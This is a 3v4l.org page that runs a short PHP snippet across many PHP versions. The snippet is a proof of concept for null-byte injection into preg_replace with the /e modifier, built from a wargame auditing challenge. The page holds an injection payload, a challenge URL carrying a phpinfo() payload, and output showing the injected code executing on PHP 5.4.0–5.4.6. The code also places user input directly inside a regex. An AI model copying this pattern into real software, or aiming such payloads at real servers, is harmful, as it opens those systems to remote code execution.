3v4l.org

run code in 300+ PHP versions simultaneously
<?php //$search = htmlentities($_GET['search']); $x="time();#apple;||/e\0"; $search=htmlentities($x); echo $search; echo "\n"; if (strpos($search, 'apple') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "apple"); }elseif (strpos($search, 'orange') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "orange"); }elseif (strpos($search, 'banana') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "banana"); }elseif (strpos($search, 'kiwi') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "kiwi"); }else echo "Please search for apple, orange, banana, or kiwi."; #http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-July/007960.html #http://ha.xxor.se/2011/06/null-byte-injection-in-pregreplace.html #http://www.enigmagroup.org/missions/basics/auditing/12/index.php?search=phpinfo();%23|apple/e%00
Output for 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
time();#apple;||/e Warning: preg_replace(): NUL is not a valid modifier in /in/4h2DJ on line 9
Output for 5.4.7 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28
time();#apple;||/e Warning: preg_replace(): Null byte in regex in /in/4h2DJ on line 9
Output for 5.4.4 - 5.4.6
time();#apple;||/e 1442360404a1442360404p1442360404p1442360404l1442360404e1442360404
Output for 5.4.0 - 5.4.3
time();#apple;||/e 1442360405a1442360405p1442360405p1442360405l1442360405e1442360405
preferences:
193.96 ms | 401 KiB | 256 Q